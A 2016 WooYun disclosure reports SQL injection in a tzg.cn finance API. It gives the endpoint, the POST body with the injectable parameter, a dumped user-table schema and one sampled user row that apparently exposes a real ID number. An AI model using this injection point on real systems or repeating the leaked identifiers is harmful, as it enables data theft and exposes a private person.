当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0167744

漏洞标题:金融安全之铜掌柜SQL注入漏洞可导致数十万用户信息泄露

相关厂商:tzg.cn

漏洞作者: 路人甲

提交时间:2016-01-06 18:45

修复时间:2016-02-20 15:48

公开时间:2016-02-20 15:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-06: 细节已通知厂商并且等待厂商处理中
2016-01-06: 厂商已经确认,细节仅向厂商公开
2016-01-16: 细节向核心白帽子及相关领域专家公开
2016-01-26: 细节向普通白帽子公开
2016-02-05: 细节向实习白帽子公开
2016-02-20: 细节向公众公开

简要描述:

铜掌柜数据接口验证不严,存在SQL注入漏洞,导致可泄露主库所有信息,包括60多万用户的账号密码、银行卡信息等

详细说明:

接口:http://rest.tzg.cn/tzgCredit/investor/asset/red/list/v2
方法:POST
提交内容:{"pageSize":10,"iloginAccountId":123456,"pageIndex":1,"itype":"1*"}

漏洞证明:

tbloginaccount表下所有字段:
+------------------------+--------------+
| Column | Type |
+------------------------+--------------+
| dtCreate | datetime |
| dtFastLastPayErrorTime | datetime |
| dtFirstInvest | datetime |
| dtLastLogin | datetime |
| dtLastPayError | datetime |
| dtLastSale | datetime |
| dtModify | datetime |
| dtUpFastPayTime | datetime |
| iCardType | int(2) |
| id | int(11) |
| iFastPayErrorTimes | int(11) |
| iFastPayState | int(2) |
| iLevel | int(2) |
| iOriginal | int(2) |
| iPaymentcipherState | int(2) |
| iType | int(2) |
| iValid | int(2) |
| iVerifyEmail | int(2) |
| iVerifyIDCard | int(2) |
| iVerifyPhone | int(2) |
| numInvestTimes | int(11) |
| numPayErrorTimes | int(11) |
| vcCardCode | varchar(50) |
| vcDeviceID | varchar(255) |
| vcEmail | varchar(50) |
| vcFastPayPassword | varchar(255) |
| vcLoginName | varchar(50) |
| vcName | varchar(500) |
| vcPassword | varchar(255) |
| vcPaymentcipher | varchar(255) |
| vcPhone | char(13) |
| vcRecommendCode | varchar(50) |
| vcRegisterDevice | varchar(50) |
| vcSource | varchar(50) |
+------------------------+--------------+
tbloginaccount表中信息采样证明:
| 126 | 1 | NULL | 1 | 2 | 2 | 刘[马塞克]欢 | 13867[马塞克][马塞克]5646 | NULL | NULL | 2015-02-05 15:20:57 | 2014-10-06 19:34:50 | 2 | 1 | NULL | 522701198806163410 | adcdb583646473905dd5d381339b5c27e[马塞克][马塞克]ea2897d7407b1f462471b4d1d6f5c | 2015-08-16 18:09:32 | lrh[马塞克]sym | 2 | 1 | NULL | NULL | 0 | NULL | NULL | NULL | 000126 | pc | NULL | NULL | NULL | NULL | NULL

修复方案:

APP中的请求接口不知道为何经常不被开发所重视

参数赋值有效性验证

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2016-01-06 20:28

厂商回复:

未重现

最新状态:

暂无